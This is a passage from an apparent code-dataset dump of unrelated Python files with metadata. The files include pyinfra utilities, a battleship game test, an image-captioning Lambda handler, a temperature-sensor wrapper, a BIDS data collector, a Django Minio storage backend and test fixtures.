np.abs(current_model[:,2] - reference_data[:,2])\n\t\t\t\tif not len(final_data):\n\t\t\t\t\tfinal_data = copy.deepcopy(current_model)\n\t\t\t\telse:\n\t\t\t\t\tfinal_data = np.append(final_data,current_model,axis=0)\n\t\t\t\t#\n\t\t\t\t\n\t\t\tX = final_data[:,0]; \n\t\t\tY = final_data[:,1]; \n\t\t\tZ = final_data[:,2]; \n\t\t\t\n\t\t\t\n\t\t\t# Finally, creating (but not showing) the graph \n\t\t\tplt.clf()\n\t\t\tdraw_xyz(X = X , Y = Y , Z = Z\n\t\t\t ,xlabel ='Frame #', ylabel =\"$Residue \\#$\", zlabel =\"$D_{1}$\"\n\t\t\t\t ,cmap = 'Reds', title='Per-residue deviation $D_{1} = |\\mathcal{R}_t - \\mathcal{R}_{1}|$\\nPDB: %s'%(final_name))\n\t\t\t#plt.yticks(np.arange(0,1.00001,0.2))\n\t\t\t# Now, we display the graph:\n\t\t\tFN = target_base+'pdb_%s_rmsd'%(final_name)\n\t\t\twrite_image(FN)\n\t\t\tprint(\"\\tSaved to:\",FN)\n\t\telse:\n\t\t\tprint('\\tChain \"%s\" has only one model. Not drawing this graph.' 
%(chain))\n\t#\n\t##########################################################################################################\n\t##########################################################################################################\n\t##########################################################################################################\n\t##########################################################################################################\n#\n\nfrom ._version import get_versions\n__version__ = get_versions()['version']\ndel get_versions\n\nif __name__ == \"__main__\":\n\tprint('Please use \"python -m backmap\" for the standalone version of backmap.')\n\t\n#from ._version import get_versions\n#__version__ = get_versions()['version']\n#del get_versions\n","sub_path":"backmap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":44903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259291011","text":"# pyinfra\n# File: pyinfra/api/util.py\n# Desc: utility functions\n\nfrom __future__ import division, print_function, unicode_literals\n\nimport re\nfrom hashlib import sha1\nfrom imp import load_source\nfrom socket import (\n error as socket_error,\n timeout as timeout_error,\n)\nfrom types import GeneratorType\n\nimport click\nimport six\n\nfrom jinja2 import Template\nfrom paramiko import SSHException\nfrom six.moves import shlex_quote\n\nfrom pyinfra import logger\n\nfrom .attrs import AttrBase\n\n# 64kb chunks\nBLOCKSIZE = 65536\n\n# Template cache\nTEMPLATES = {}\nFILE_SHAS = {}\n\n\ndef ensure_host_list(hosts, inventory):\n if hosts is None:\n return hosts\n\n # If passed a string, treat as group name and get hosts from inventory\n if isinstance(hosts, six.string_types):\n return inventory.get_group(hosts)\n\n if not isinstance(hosts, (list, tuple)):\n return [hosts]\n\n return hosts\n\n\ndef pop_op_kwargs(state, kwargs):\n '''\n Pop and return operation global keyword 
arguments.\n '''\n\n meta_kwargs = state.deploy_kwargs or {}\n\n def get_kwarg(key, default=None):\n return kwargs.pop(key, meta_kwargs.get(key, default))\n\n # Get the env for this host: config env followed by command-level env\n env = state.config.ENV.copy()\n env.update(get_kwarg('env', {}))\n\n hosts = get_kwarg('hosts')\n hosts = ensure_host_list(hosts, inventory=state.inventory)\n\n # Filter out any hosts not in the meta kwargs (nested support)\n if meta_kwargs.get('hosts') is not None:\n hosts = [\n host for host in hosts\n if host in meta_kwargs['hosts']\n ]\n\n return {\n # ENVars for commands in this operation\n 'env': env,\n # Hosts to limit the op to\n 'hosts': hosts,\n # When to limit the op (default always)\n 'when': get_kwarg('when', True),\n # Locally & globally configurable\n 'sudo': get_kwarg('sudo', state.config.SUDO),\n 'sudo_user': get_kwarg('sudo_user', state.config.SUDO_USER),\n 'su_user': get_kwarg('su_user', state.config.SU_USER),\n # Whether to preserve ENVars when sudoing (eg SSH forward agent socket)\n 'preserve_sudo_env': get_kwarg(\n 'preserve_sudo_env', state.config.PRESERVE_SUDO_ENV,\n ),\n # Ignore any errors during this operation\n 'ignore_errors': get_kwarg(\n 'ignore_errors', state.config.IGNORE_ERRORS,\n ),\n # Timeout on running the command\n 'timeout': get_kwarg('timeout'),\n # Get a PTY before executing commands\n 'get_pty': get_kwarg('get_pty', False),\n # Forces serial mode for this operation (--serial for one op)\n 'serial': get_kwarg('serial', False),\n # Only runs this operation once\n 'run_once': get_kwarg('run_once', False),\n # Execute in batches of X hosts rather than all at once\n 'parallel': get_kwarg('parallel'),\n # Callbacks\n 'on_success': get_kwarg('on_success'),\n 'on_error': get_kwarg('on_error'),\n # Operation hash\n 'op': get_kwarg('op'),\n }\n\n\ndef unroll_generators(generator):\n '''\n Take a generator and unroll any sub-generators recursively. 
This is\n essentially a Python 2 way of doing `yield from` in Python 3 (given\n iterating the entire thing).\n '''\n\n # Ensure we have a generator (prevents ccommands returning lists)\n if not isinstance(generator, GeneratorType):\n raise TypeError('{0} is not a generator'.format(generator))\n\n items = []\n\n for item in generator:\n if isinstance(item, GeneratorType):\n items.extend(unroll_generators(item))\n else:\n items.append(item)\n\n return items\n\n\ndef exec_file(filename, return_locals=False):\n '''\n Execute a Python file and optionally return it's attributes as a dict.\n '''\n\n module_name = '_pyinfra_{0}'.format(filename.replace('.', '_'))\n module = load_source(module_name, filename)\n\n if return_locals:\n return {\n key: getattr(module, key)\n for key in dir(module)\n }\n\n\ndef get_template(filename_or_string, is_string=False):\n '''\n Gets a jinja2 ``Template`` object for the input filename or string, with caching\n based on the filename of the template, or the SHA1 of the input string.\n '''\n\n # Cache against string sha or just the filename\n cache_key = sha1_hash(filename_or_string) if is_string else filename_or_string\n\n if cache_key in TEMPLATES:\n return TEMPLATES[cache_key]\n\n if is_string:\n # Set the input string as our template\n template_string = filename_or_string\n\n else:\n # Load template data into memory\n with open(filename_or_string, 'r') as file_io:\n template_string = file_io.read()\n\n TEMPLATES[cache_key] = Template(template_string, keep_trailing_newline=True)\n return TEMPLATES[cache_key]\n\n\ndef underscore(name):\n '''\n Transform CamelCase -> snake_case.\n '''\n\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef sha1_hash(string):\n '''\n Return the SHA1 of the input string.\n '''\n\n hasher = sha1()\n hasher.update(string.encode())\n return hasher.hexdigest()\n\n\ndef format_exception(e):\n return '{0}{1}'.format(e.__class__.__name__, 
e.args)\n\n\ndef log_host_command_error(host, e, timeout=0):\n if isinstance(e, timeout_error):\n logger.error('{0}{1}'.format(\n host.print_prefix,\n click.style('Command timed out after {0}s'.format(\n timeout,\n ), 'red'),\n ))\n\n elif isinstance(e, (socket_error, SSHException)):\n logger.error('{0}{1}'.format(\n host.print_prefix,\n click.style('Command socket/SSH error: {0}'.format(\n format_exception(e)), 'red',\n ),\n ))\n\n\ndef make_command(\n command,\n env=None,\n su_user=None,\n sudo=False,\n sudo_user=None,\n preserve_sudo_env=False,\n):\n '''\n Builds a shell command with various kwargs.\n '''\n\n debug_meta = {}\n\n for key, value in (\n ('sudo', sudo),\n ('sudo_user', sudo_user),\n ('su_user', su_user),\n ('env', env),\n ):\n if value:\n debug_meta[key] = value\n\n logger.debug('Building command ({0})'.format(' '.join(\n '{0}: {1}'.format(key, value)\n for key, value in six.iteritems(debug_meta)\n )))\n\n # Use env & build our actual command\n if env:\n env_string = ' '.join([\n '{0}={1}'.format(key, value)\n for key, value in six.iteritems(env)\n ])\n command = 'export {0}; {1}'.format(env_string, command)\n\n # Quote the command as a string\n command = shlex_quote(command)\n\n # Switch user with su\n if su_user:\n command = 'su {0} -c {1}'.format(su_user, command)\n\n # Otherwise just sh wrap the command\n else:\n command = 'sh -c {0}'.format(command)\n\n # Use sudo (w/user?)\n if sudo:\n sudo_bits = ['sudo', '-H']\n\n if preserve_sudo_env:\n sudo_bits.append('-E')\n\n if sudo_user:\n sudo_bits.extend(('-u', sudo_user))\n\n command = '{0} {1}'.format(' '.join(sudo_bits), command)\n\n return command\n\n\ndef get_arg_value(state, host, arg):\n '''\n Runs string arguments through the jinja2 templating system with a state and host. Used\n to avoid string formatting in deploy operations which result in one operation per\n host/variable. 
By parsing the commands after we generate the ``op_hash``, multiple\n command variations can fall under one op.\n '''\n\n if isinstance(arg, six.string_types):\n template = get_template(arg, is_string=True)\n data = {\n 'host': host,\n 'inventory': state.inventory,\n }\n\n return template.render(data)\n\n elif isinstance(arg, list):\n return [get_arg_value(state, host, value) for value in arg]\n\n elif isinstance(arg, tuple):\n return tuple(get_arg_value(state, host, value) for value in arg)\n\n elif isinstance(arg, dict):\n return {\n key: get_arg_value(state, host, value)\n for key, value in six.iteritems(arg)\n }\n\n return arg\n\n\ndef make_hash(obj):\n '''\n Make a hash from an arbitrary nested dictionary, list, tuple or set, used to generate\n ID's for operations based on their name & arguments.\n '''\n\n if isinstance(obj, (set, tuple, list)):\n hash_string = ''.join([make_hash(e) for e in obj])\n\n elif isinstance(obj, dict):\n hash_string = ''.join(\n ''.join((key, make_hash(value)))\n for key, value in six.iteritems(obj)\n )\n\n else:\n hash_string = (\n # pyinfra attr key where available (host/inventory data), see attrs.py\n obj.pyinfra_attr_key if isinstance(obj, AttrBase)\n # Plain strings\n else obj if isinstance(obj, six.string_types)\n # Objects with names\n else obj.__name__ if hasattr(obj, '__name__')\n # Repr anything else\n else repr(obj)\n )\n\n return sha1_hash(hash_string)\n\n\nclass get_file_io(object):\n '''\n Given either a filename or an existing IO object, this context processor will open\n and close filenames, and leave IO objects alone.\n '''\n\n close = False\n\n def __init__(self, filename_or_io):\n if not (\n # Check we can be read\n hasattr(filename_or_io, 'read')\n # Or we're a filename\n or isinstance(filename_or_io, six.string_types)\n ):\n raise TypeError('Invalid filename or IO object: {0}'.format(\n filename_or_io,\n ))\n\n self.filename_or_io = filename_or_io\n\n def __enter__(self):\n # If we have a read attribute, just use 
the object as-is\n if hasattr(self.filename_or_io, 'read'):\n file_io = self.filename_or_io\n\n # Otherwise, assume a filename and open it up\n else:\n file_io = open(self.filename_or_io, 'rb')\n\n # Attach to self for closing on __exit__\n self.file_io = file_io\n self.close = True\n\n # Ensure we're at the start of the file\n file_io.seek(0)\n return file_io\n\n def __exit__(self, type, value, traceback):\n if self.close:\n self.file_io.close()\n\n @property\n def cache_key(self):\n # If we're a filename, cache against that - we don't cache in-memory\n # file objects.\n if isinstance(self.filename_or_io, six.string_types):\n return self.filename_or_io\n\n\ndef get_file_sha1(filename_or_io):\n '''\n Calculates the SHA1 of a file or file object using a buffer to handle larger files.\n '''\n\n file_data = get_file_io(filename_or_io)\n cache_key = file_data.cache_key\n\n if cache_key and cache_key in FILE_SHAS:\n return FILE_SHAS[cache_key]\n\n with file_data as file_io:\n hasher = sha1()\n buff = file_io.read(BLOCKSIZE)\n\n while len(buff) > 0:\n if isinstance(buff, six.text_type):\n buff = buff.encode('utf-8')\n\n hasher.update(buff)\n buff = file_io.read(BLOCKSIZE)\n\n digest = hasher.hexdigest()\n\n if cache_key:\n FILE_SHAS[cache_key] = digest\n\n return digest\n\n\ndef read_buffer(io, print_output=False, print_func=False):\n '''\n Reads a file-like buffer object into lines and optionally prints the output.\n '''\n\n # TODO: research this further - some steps towards handling stdin (ie password requests\n # from programs that don't notice there's no TTY to accept passwords from!). This just\n # prints output as below, but stores partial lines in a buffer, which could be printed\n # when ready to accept input. Or detected and raise an error.\n\n # GitHub issue: https://github.com/Fizzadar/pyinfra/issues/40\n\n # buff = ''\n # data = io.read(1)\n\n # while data:\n # # Append to the buffer\n # buff += data\n\n # # Newlines in the buffer? 
Break them out\n # if '\\n' in buff:\n # lines = buff.split('\\n')\n\n # # Set the buffer back to just the last line\n # buff = lines[-1]\n\n # # Get the other lines, strip them\n # lines = [\n # line.strip()\n # for line in lines[:-1]\n # ]\n\n # out.extend(lines)\n\n # for line in lines:\n # _print(line)\n\n # # Get next data\n # data = io.read(1)\n\n # if buff:\n # line = buff.strip()\n # out.append(line)\n # _print(line)\n\n def _print(line):\n if print_output:\n if print_func:\n print(print_func(line))\n else:\n print(line)\n\n out = []\n\n for line in io:\n # Handle local Popen shells returning list of bytes, not strings\n if not isinstance(line, six.text_type):\n line = line.decode('utf-8')\n\n line = line.strip()\n out.append(line)\n\n _print(line)\n\n return out\n","sub_path":"pyinfra/api/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18668027","text":"import queue\nimport threading\nimport time\nimport unittest\nfrom datetime import datetime\nfrom battleships_pb2 import Attack, Request, Status\nfrom server import Battleship\n\nREDIS_HOST = 'localhost'\n\n\ndef stream(q, p):\n while True:\n s = q.get()\n if s is not None:\n print(f'{datetime.now()} - {p} - Sending -', s, flush=True)\n yield s\n else:\n return\n\n\ndef read_incoming(input_stream, s):\n while True:\n try:\n response = next(input_stream)\n print(f'{datetime.now()} - {s} - Received -', response, flush=True)\n except StopIteration:\n return\n\n\ndef attack(vector):\n return Request(move=Attack(vector=vector))\n\n\ndef report(state):\n return Request(report=Status(state=state))\n\n\ndef start_thread(_stream, name):\n t = threading.Thread(target=lambda: read_incoming(_stream, name))\n t.daemon = True\n t.start()\n\n\ndef test_simple_game_play():\n delay = 0.5\n\n player_1 = 'Alice'\n player_2 = 'Bob'\n\n alice = queue.Queue()\n bob = queue.Queue()\n game_server_1 = 
Battleship(REDIS_HOST)\n game_server_2 = Battleship(REDIS_HOST)\n\n input_stream_1 = game_server_1.Game(stream(alice, player_1), {})\n input_stream_2 = game_server_2.Game(stream(bob, player_2), {})\n\n start_thread(input_stream_1, player_1)\n start_thread(input_stream_2, player_2)\n\n # Both players join\n alice.put(Request(join=Request.Player(id=player_1)))\n time.sleep(delay)\n bob.put(Request(join=Request.Player(id=player_2)))\n time.sleep(delay)\n\n # Player 1 gets to start\n alice.put(attack(\"a1\"))\n bob.put(report(Status.State.MISS))\n time.sleep(delay)\n\n # Now it is Player 2's turn\n bob.put(attack(\"j10\"))\n alice.put(report(Status.State.HIT))\n time.sleep(delay)\n\n # Now it is Player 1's turn\n alice.put(attack(\"c5\"))\n bob.put(report(Status.State.MISS))\n time.sleep(delay)\n\n # Now it is Player 2's turn\n bob.put(attack(\"e3\"))\n alice.put(report(Status.State.DEFEAT))\n time.sleep(delay)\n\n alice.put(None)\n bob.put(None)\n time.sleep(1)\n\n\n# class TestGamePlay(unittest.TestCase):\n# def test_simple_game_play(self):\n# test_simple_game_play()\n\n\nif __name__ == '__main__':\n test_simple_game_play()\n","sub_path":"server/test/test_game_play.py","file_name":"test_game_play.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262123311","text":"#coding:utf-8\nclass Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n dict = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n num = 0\n for i in range(len(s)-1):\n if dict[s[i]] < dict[s[i+1]]:\n num -= dict[s[i]]\n else:\n num += dict[s[i]]\n\n #加上字符串最后一个数\n num += dict[s[-1]]\n return num\n\n\n\nif __name__ == '__main__':\n s = Solution()\n input = \"MCMXCIV\"\n result = s.romanToInt(input)\n 
print(result)\n","sub_path":"013.romanToInt.py","file_name":"013.romanToInt.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576260685","text":"try:\n import unzip_requirements\nexcept ImportError:\n pass\n\nfrom PIL import Image\nimport numpy as np\n\nimport boto3\nimport os\nimport io\nimport base64\nimport json\nfrom requests_toolbelt.multipart import decoder\n\nfrom image_caption import load_model, load_word_map, caption_image\nprint(\"Import end...\")\n\nS3_BUCKET = 'motley-imagecaption-flickr30k'\nMODEL_PATH = 'imageCaption_flickr30k_checkpoint.pth.tar'\nword_map_file = 'WORDMAP.json'\n\ns3 = boto3.client('s3')\n\n# Load checkpoint file from S3. Load encoder, decoder model from the checkpoint using image_caption.load_model\ntry:\n if os.path.isfile(MODEL_PATH) != True:\n obj = s3.get_object(Bucket = S3_BUCKET, Key = MODEL_PATH)\n print(\"Downloading model...\")\n checkpoint = io.BytesIO(obj['Body'].read())\n print(\"Checkpoint loaded\")\n encoder_model, decoder_model = load_model(checkpoint)\n print(\"Encoder-Decoder model loaded\")\n\nexcept Exception as e:\n print(repr(e))\n raise(e)\n\n# Load word_map and rev_word_map dictionaries from word_map_file json.\nword_map, rev_word_map = load_word_map(word_map_file)\nprint(\"Word map dict loaded\")\n\n# Load input image from event.\ndef load_input_image(event):\n # Returns PIL image and uploaded filename.\n content_type_header = event['headers']['content-type']\n body = base64.b64decode(event[\"body\"])\n print(\"Image body in caption_image loaded\")\n picture = decoder.MultipartDecoder(body, content_type_header).parts[0]\n filename = picture.headers[b'Content-Disposition'].decode().split(';')[1].split('=')[1]\n if len(filename) < 4:\n filename = picture.headers[b'Content-Disposition'].decode().split(';')[2].split('=')[1]\n print(\"picture object from body- \",picture)\n print(\"picture object content from body- 
\", picture.content)\n input_image = Image.open(io.BytesIO(picture.content))\n return input_image, filename\n\n\ndef caption_this(event, context):\n try:\n image, filename = load_input_image(event)\n\n caption = caption_image(encoder_model, decoder_model, image, word_map, rev_word_map)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*',\n \"Access-Control-Allow-Credentials\": True\n },\n \"body\": json.dumps({'file': filename.replace('\"', ''), 'caption': caption})\n }\n\n except Exception as e:\n print(repr(e))\n return {\n \"statusCode\": 500,\n \"headers\": {\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Origin': '*',\n \"Access-Control-Allow-Credentials\": True\n },\n \"body\": json.dumps({\"error\": repr(e)})\n }\n","sub_path":"12 - Image Captioning & Text to Images/deployment/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"168558071","text":"N,K=map(int,input().split())\nList = list(map(int, input().split()))\n \ndef imosu(x,k):\n data = [0]*k\n for i in range(k):\n first = i-x[i]\n last = i+x[i]\n if first < 0:\n first = 0\n data[first] += 1\n if last+1 < k:\n data[last+1] +=-1\n ruiseki = [0]*k\n ruiseki[0] = data[0]\n for i in range(k-1):\n ruiseki[i+1] = ruiseki[i] + data[i+1]\n return ruiseki\n \nfor i in range(K):\n List = imosu(List,N)\n if List.count(N) == N:\n break\nprint(*List)","sub_path":"Python_codes/p02647/s608748102.py","file_name":"s608748102.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369665622","text":"from typing import Optional\nfrom datetime import datetime\nfrom w1thermsensor import W1ThermSensor, Sensor\nfrom w1thermsensor import NoSensorFoundError, SensorNotReadyError, ResetValueError\nfrom .measurements 
import Measurement, MeasurementError\n\ndef enumerate_sensors():\n sensors = []\n for available_sensor in W1ThermSensor.get_available_sensors([Sensor.DS18B20]):\n try:\n sensor = ds18b20(available_sensor.id)\n except Exception as error:\n print(\"Error initialising DS18B20 sensor with ID {}: {}\".format(available_sensor.id, str(error)))\n else:\n print(\"Found DS18B20 sensor with ID {:012x}\".format(sensor.serial_number))\n sensors.append(sensor)\n return sensors\n\n\nclass ds18b20():\n\n manufacturer = 'MAXIM'\n model = 'DS18B20'\n supported_measurements = [Measurement.TEMPERATURE]\n\n def __init__(self, sensor_id: Optional[str] = None):\n self._w1therm = W1ThermSensor(sensor_type=Sensor.DS18B20, sensor_id=sensor_id)\n self._id = sensor_id\n self.temperature = None\n\n def update_sensor(self):\n try:\n self.temperature = self._w1therm.get_temperature()\n except (NoSensorFoundError, SensorNotReadyError, ResetValueError) as error:\n raise MeasurementError(str(error))\n else:\n self.timestamp = datetime.now().isoformat(timespec='seconds')\n\n @property\n def id(self):\n \"\"\"A unique identifier for the device.\"\"\"\n return \"{model:s}--{serial:012x}\".format(model=self.model.replace('-',''), serial=self.serial_number).lower()\n\n @property\n def serial_number(self):\n \"\"\"The hardware identifier (serial number) for the device.\"\"\"\n serial = int(self._id, 16)\n return serial\n","sub_path":"sensors/ds18b20.py","file_name":"ds18b20.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45552222","text":"from glob import glob\nimport copy\nimport json\nimport os\nimport re\n\nINPUTS_SPEC = {'fieldmaps': [], 'epi': '', 'sbref': [], 't1': ''}\n\ndef gen_list(inlist, base=1):\n return range(base, len(inlist) + base)\n\ndef _walk_dir_for_prefix(target_dir, prefix):\n return [x for x in next(os.walk(target_dir))[1]\n if x.startswith(prefix)]\n\n\ndef get_subject(bids_root, 
subject_id, session_id=None, run_id=None,\n include_types=None):\n \"\"\"\n Returns the imaging_data structure for the subject subject_id.\n If session is None, then the BIDS structure is not multisession.\n If run_id is None, it is assumed that the session does not have several\n runs.\n \"\"\"\n if include_types is None:\n # Please notice that dwi is not here\n include_types = ['func', 'anat', 'fmap']\n subject_data = collect_bids_data(bids_root, include_types=None)\n subject_data = subject_data['sub-' + subject_id]\n\n if session_id is None:\n subject_data = subject_data[list(subject_data.keys())[0]]\n else:\n raise NotImplementedError\n\n if run_id is not None:\n raise NotImplementedError\n\n return subject_data\n\n\n# if no scan_subject or scan_session are defined return all bids data for a\n# given bids directory. Otherwise just the data for a given subject or scan\n# can be returned\ndef collect_bids_data(dataset, include_types=None, scan_subject='sub-',\n scan_session='ses-'):\n imaging_data = {}\n if include_types is None:\n include_types = ['func', 'anat', 'fmap', 'dwi']\n\n subjects = _walk_dir_for_prefix(dataset, scan_subject)\n if len(subjects) == 0:\n raise GeneratorExit(\"No BIDS subjects found to examine.\")\n\n for subject in subjects:\n if subject not in imaging_data:\n imaging_data[subject] = {}\n subj_dir = os.path.join(dataset, subject)\n\n sessions = _walk_dir_for_prefix(subj_dir, scan_session)\n\n for scan_type in include_types:\n # seems easier to consider the case of multi-session vs.\n # single session separately?\n if len(sessions) > 0:\n subject_sessions = [os.path.join(subject, x)\n for x in sessions]\n else:\n subject_sessions = [subject]\n\n for session in subject_sessions:\n if session not in imaging_data[subject]:\n imaging_data[subject][session] = copy.deepcopy(INPUTS_SPEC)\n scan_files = glob(os.path.join(dataset, session, scan_type,\n '*'))\n\n for scan_file in scan_files:\n filename = scan_file.split('/')[-1]\n filename_parts = 
filename.split('_')\n modality = filename_parts[-1]\n if 'sbref.nii' in modality:\n imaging_data[subject][session]['sbref'].append(scan_file)\n elif 'epi.nii' in modality:\n imaging_data[subject][session]['fieldmaps'].append(scan_file)\n elif 'T1w.nii' in modality:\n imaging_data[subject][session]['t1'] = scan_file\n # temporary conditional until runs and tasks are handled\n # in the imaging data structure\n elif 'rest_acq-LR_run-1' in filename:\n if 'bold.nii' in modality:\n imaging_data[subject][session]['epi'] = scan_file\n else:\n pass\n\n return imaging_data\n\nif __name__ == '__main__':\n pass\n","sub_path":"fmriprep/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254394075","text":"from __future__ import unicode_literals\n\nimport minio\nfrom minio.error import ResponseError\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.files.storage import Storage\nfrom django.utils.deconstruct import deconstructible\nfrom django.conf import settings\n\nimport mimetypes\nimport datetime\n\nfrom logging import getLogger\n\nlogger = getLogger(\"minio_storage\")\n\n\ndef get_setting(name, default=None):\n result = getattr(settings, name, default)\n if result is None:\n print(\"Attr {} : {}\".format(name, getattr(settings, name, default)))\n raise ImproperlyConfigured\n else:\n return result\n\n\n@deconstructible\nclass MinioStorage(Storage):\n \"\"\"\n An implementation of Django's file storage using the minio client.\n \"\"\"\n\n def __init__(self):\n self.endpoint = get_setting(\"MINIO_STORAGE_ENDPOINT\")\n self.access_key = get_setting(\"MINIO_STORAGE_ACCESS_KEY\")\n self.secret_key = get_setting(\"MINIO_STORAGE_SECRET_KEY\")\n self.secure = get_setting(\"MINIO_STORAGE_USE_HTTPS\", True)\n\n self.client = minio.Minio(self.endpoint,\n access_key=self.access_key,\n secret_key=self.secret_key,\n 
secure=self.secure)\n\n super(MinioStorage, self).__init__()\n\n def _sanitize_path(self, name):\n return name.lstrip(\"./\")\n\n def _examine_file(self, name, content):\n \"\"\"\n Examines a file and produces information necessary for upload.\n\n Returns a tuple of the form (content_size, content_type, sanitized_name)\n \"\"\"\n content_size = content.size\n content_type = mimetypes.guess_type(name, strict=False)\n content_type = content_type[0] or \"application/octet-stream\"\n sane_name = self._sanitize_path(name)\n return (content_size, content_type, sane_name)\n\n def _open(self, name, mode=\"rb\"):\n if mode.find(\"w\") > -1:\n raise NotImplementedError(\"Minio storage cannot write to file\")\n try:\n return self.client.get_object(self.bucket_name, name)\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"File {} does not exist\".format(name))\n\n def _save(self, name, content):\n # (str, bytes) -> str\n try:\n content_size, content_type, sane_name = self._examine_file(name, content)\n self.client.put_object(self.bucket_name,\n sane_name,\n content,\n content_size,\n content_type)\n return sane_name\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"File {} could not be saved\".format(name))\n\n def delete(self, name):\n # type: (str) -> None\n try:\n self.client.remove_object(self.bucket_name, name)\n except ResponseError as error:\n logger.warn(\"Object deletion failed\")\n logger.warn(error)\n raise IOError(\"Could not remove file {}\".format(name))\n\n def exists(self, name):\n # type: (str) -> bool\n try:\n self.client.stat_object(self.bucket_name, self._sanitize_path(name))\n return True\n except ResponseError as error:\n if error.code == \"NoSuchKey\":\n return False\n else:\n logger.warn(error)\n raise IOError(\"Could not stat file {}\".format(name))\n\n def listdir(self, path):\n try:\n # TODO: break the path\n return self.client.list_objects(self.bucket_name, path)\n except ResponseError as error:\n 
logger.warn(error)\n raise IOError(\"Could not list directory {}\".format(path))\n\n def size(self, name):\n # type: (str) -> int\n try:\n info = self.client.stat_object(self.bucket_name, name)\n return info.size\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\"Could not access file size for {}\".format(name))\n\n def url(self, name):\n # type: (str) -> str\n #if self.exists(name):\n # return self.client.presigned_get_object(self.bucket_name, name)\n #else:\n # raise IOError(\"This file does not exist\")\n return \"https://static.storekit.org/\" + self.bucket_name + \"/\" + name\n\n def accessed_time(self, name):\n # type: (str) -> datetime.datetime\n \"\"\"\n Not available via the S3 API\n \"\"\"\n return self.modified_time(name)\n\n def created_time(self, name):\n # type: (str) -> datetime.datetime\n \"\"\"\n Not available via the S3 API\n \"\"\"\n return self.modified_time(name)\n\n def modified_time(self, name):\n # type: (str) -> datetime.datetime\n try:\n info = self.client.stat_object(self.bucket_name, name)\n return datetime.datetime.fromtimestamp(info.last_modified)\n except ResponseError as error:\n logger.warn(error)\n raise IOError(\n \"Could not access modification time for file {}\".format(name))\n\n@deconstructible\nclass MinioMediaStorage(MinioStorage):\n def __init__(self):\n super(MinioMediaStorage, self).__init__()\n self.bucket_name = get_setting(\"MINIO_STORAGE_MEDIA_BUCKET_NAME\")\n # self.static_use_media_bucket = get_setting(\n # \"MINIO_STORAGE_STATIC_USE_MEDIA_BUCKET\")\n self.auto_create_media_bucket = get_setting(\n \"MINIO_STORAGE_AUTO_CREATE_MEDIA_BUCKET\", False)\n\n if self.auto_create_media_bucket and not self.client.bucket_exists(\n self.bucket_name):\n self.client.make_bucket(self.bucket_name)\n elif not self.client.bucket_exists(self.bucket_name):\n raise IOError(\"The media bucket does not exist\")\n\n\n@deconstructible\nclass MinioStaticStorage(MinioStorage):\n def __init__(self):\n 
super(MinioStaticStorage, self).__init__()\n self.bucket_name = get_setting(\"MINIO_STORAGE_STATIC_BUCKET_NAME\")\n self.auto_create_static_bucket = get_setting(\n \"MINIO_STORAGE_AUTO_CREATE_STATIC_BUCKET\", False)\n\n if self.auto_create_static_bucket and not self.client.bucket_exists(\n self.bucket_name):\n self.client.make_bucket(self.bucket_name)\n elif not self.client.bucket_exists(self.bucket_name):\n raise IOError(\"The static bucket does not exist\")\n","sub_path":"minio_storage/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"493315579","text":"import datetime\n\nimport pytest\nfrom pytest_bdd import given, scenario, then, when\n\nfrom models import AgreementType, BudgetLineItem, BudgetLineItemStatus, ContractAgreement, ContractType, DirectAgreement\n\n\n@pytest.fixture()\ndef contract_agreement(loaded_db):\n contract_agreement = ContractAgreement(\n name=\"Feature Test Contract\",\n number=\"BDD0999\",\n contract_number=\"CT0999\",\n contract_type=ContractType.RESEARCH,\n agreement_type=AgreementType.CONTRACT,\n research_project_id=1,\n )\n loaded_db.add(contract_agreement)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(contract_agreement)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef contract_with_draft_bli(loaded_db, contract_agreement):\n draft_bli = BudgetLineItem(\n agreement_id=contract_agreement.id,\n comments=\"blah bleh bleh blah\",\n line_description=\"LI Draft\",\n amount=100.12,\n can_id=1,\n date_needed=datetime.date(2043, 1, 1),\n status=BudgetLineItemStatus.DRAFT,\n psc_fee_amount=1.23,\n created_by=1,\n )\n loaded_db.add(draft_bli)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(draft_bli)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef contract_with_planned_bli(loaded_db, contract_agreement):\n planned_bli = BudgetLineItem(\n 
